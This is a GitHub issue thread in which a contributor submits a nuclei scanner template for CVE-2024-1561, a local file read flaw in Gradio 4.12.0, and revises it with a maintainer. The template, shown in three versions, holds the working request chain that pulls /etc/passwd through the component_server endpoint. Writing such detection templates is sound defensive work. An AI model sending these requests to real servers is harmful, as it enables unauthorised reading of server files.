Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[nuclei-template] CVE-2024-1561 #9771

Closed
DiabloHTB opened this issue May 12, 2024 · 5 comments · Fixed by #9800
Closed

[nuclei-template] CVE-2024-1561 #9771

DiabloHTB opened this issue May 12, 2024 · 5 comments · Fixed by #9800
Assignees
@DhiyaneshGeek
Labels
Done Ready to merge nuclei-template Nuclei template contribution

Comments

@DiabloHTB
Copy link

Template Information:

Local file read by calling arbitrary methods of Components class in Gradio 4.12.0, the template I created detects this by trying to get the /etc/passwd and matching with the word root using three requests :

  • GET /config and extracting the id of the first component
  • POST /component_server and using the previously extracted id to get the temporary path of the /etc/passwd, the response is in double quotes, using regex to extract the hash inside it and using in the next request
    -------NOTE------

This step can be improved by extracting the whole path without double quotes using regex, I couldn't find a way to do this.

  • GET tmpath to get the /etc/passwd using the already extracted hash, example "/tmp/gradio/{{tmpath}}passwd" and match with the word "root:[x*]:0:0:"

Gradio https://github.com/gradio-app/gradio
Full writeup and Python script to exploit: https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
Sh PoC was created by me:https://github.com/DiabloHTB/CVE-2024-1561

Nuclei Template:

id: CVE-2024-1561

info:
  name: CVE-2024-1561
  author: Diablo
  description: |
    Local file read by calling arbitrary methods of Components class
  severity: HIGH
  
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server
  
  remediation: |
    Update to Gradio 4.13.0

  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  
  reference:
   - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
   - https://github.com/DiabloHTB/CVE-2024-1561
   - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561
  
  metadata:
    max-request: 1
    vendor: Gradio
    product: https://github.com/gradio-app/gradio
  tags: cve,cve2024,intrusive,unauth,gradio,path-traversal


http:
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        group: 1
        json:
          - '.components[0].id'
        internal: true
    
  - raw:
      - | 
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        
        {"component_id": "{{first-component}}",
        "data": "/etc/passwd",
        "fn_name": "move_resource_to_block_cache",
        "session_hash": "aaaaaaaaaaa"}
    
    extractors:
      - type: regex
        name: tmpath
        regex: 
          - "/(?P<hash>[a-fA-F0-9]+)/"
        internal: true
        

  - raw:
      - |
        GET /file=/tmp/gradio{{tmpath}}passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

Example output :

[CVE-2024-1561] [http] [high] http://127.0.0.1:7860/file=/tmp/gradio/83bbb89b677a9cca3d271a392fa1aa2a10853c32/passwd
@DiabloHTB DiabloHTB added the nuclei-template Nuclei template contribution label May 12, 2024
@DiabloHTB
Copy link
Author

Check here for usage and output https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561/tree/main

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label May 14, 2024
@DhiyaneshGeek DhiyaneshGeek linked a pull request May 14, 2024 that will close this issue
Create CVE-2024-1561.yaml #9800
Merged
2 tasks
@DiabloHTB
Copy link
Author

@DhiyaneshGeek I have an improvement to this for the regex part before this gets added :

  • I found a way to extract the full path between the "" and to use that as variable instead of just the hash, making this applicable even if they don't have the gradio folder /tmp/anything/hash/passwd instead of just /tmp/gradio/hash/passwd
id: CVE-2024-1561

info:
  name: CVE-2024-1561
  author: Diablo
  description: |
    Local file read by calling arbitrary methods of Components class
  severity: HIGH
  
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server
  
  remediation: |
    Update to Gradio 4.13.0

  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  
  reference:
   - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
   - https://github.com/DiabloHTB/CVE-2024-1561
   - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561
  
  metadata:
    max-request: 1
    vendor: Gradio
    product: https://github.com/gradio-app/gradio
  tags: cve,cve2024,intrusive,unauth,gradio,path-traversal


http:
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        group: 1
        json:
          - '.components[0].id'
        internal: true
    
  - raw:
      - | 
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        
        {"component_id": "{{first-component}}",
        "data": "/etc/passwd",
        "fn_name": "move_resource_to_block_cache",
        "session_hash": "aaaaaaaaaaa"}
    
    extractors:
      - type: regex
        name: tmpath
        regex: 
          - \/[a-zA-Z0-9\/]+
        internal: true
        

  - raw:
      - |
        GET /file={{tmpath}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

@DhiyaneshGeek
Copy link
Member

Hi @DiabloHTB

this below part only updated right ?

    extractors:
      - type: regex
        name: tmpath
        regex: 
          - \/[a-zA-Z0-9\/]+
        internal: true

@DiabloHTB
Copy link
Author

DiabloHTB commented May 14, 2024
edited

@DhiyaneshGeek Hey there, that part and the last request changed from GET /file=/tmp/gradio{{tmpath}}passwd HTTP/1.1 to GET /file={{tmpath}} HTTP/1.1 since i know have the full path not just the hash, below is the full signed template, let me know if I need to add something this is my first template

id: CVE-2024-1561

info:
  name: CVE-2024-1561
  author: Diablo
  description: |
    Local file read by calling arbitrary methods of Components class
  severity: HIGH
  
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server
  
  remediation: |
    Update to Gradio 4.13.0

  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  
  reference:
   - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
   - https://github.com/DiabloHTB/CVE-2024-1561
   - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561
  
  metadata:
    max-request: 1
    vendor: Gradio
    product: https://github.com/gradio-app/gradio
  tags: cve,cve2024,intrusive,unauth,gradio,path-traversal


http:
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        group: 1
        json:
          - '.components[0].id'
        internal: true
    
  - raw:
      - | 
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        
        {"component_id": "{{first-component}}",
        "data": "/etc/passwd",
        "fn_name": "move_resource_to_block_cache",
        "session_hash": "aaaaaaaaaaa"}
    
    extractors:
      - type: regex
        name: tmpath
        regex: 
          - \/[a-zA-Z0-9\/]+
        internal: true
        

  - raw:
      - |
        GET /file={{tmpath}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body




      
# digest: 490a0046304402203c6137fea5301e4c6d68e46f20ce0a6c5a88919d747eecf8b4f4df9773d84845022031b061bfbc332f22390d9ea69831e2f94586cc49fd8a1b1419dd39c2a8dda8d1:9c69f0f6a1e1d9ed8dd8d3f14441892c

@DhiyaneshGeek
Copy link
Member

Hi @DiabloHTB i'll update the PR #9800 from my side

You can grab your cool PD stickers over here http://nux.gg/stickers 😄

Thanks for sharing the updated template

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels
Done Ready to merge nuclei-template Nuclei template contribution
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Create CVE-2024-1561.yaml projectdiscovery/nuclei-templates
2 participants
@DhiyaneshGeek @DiabloHTB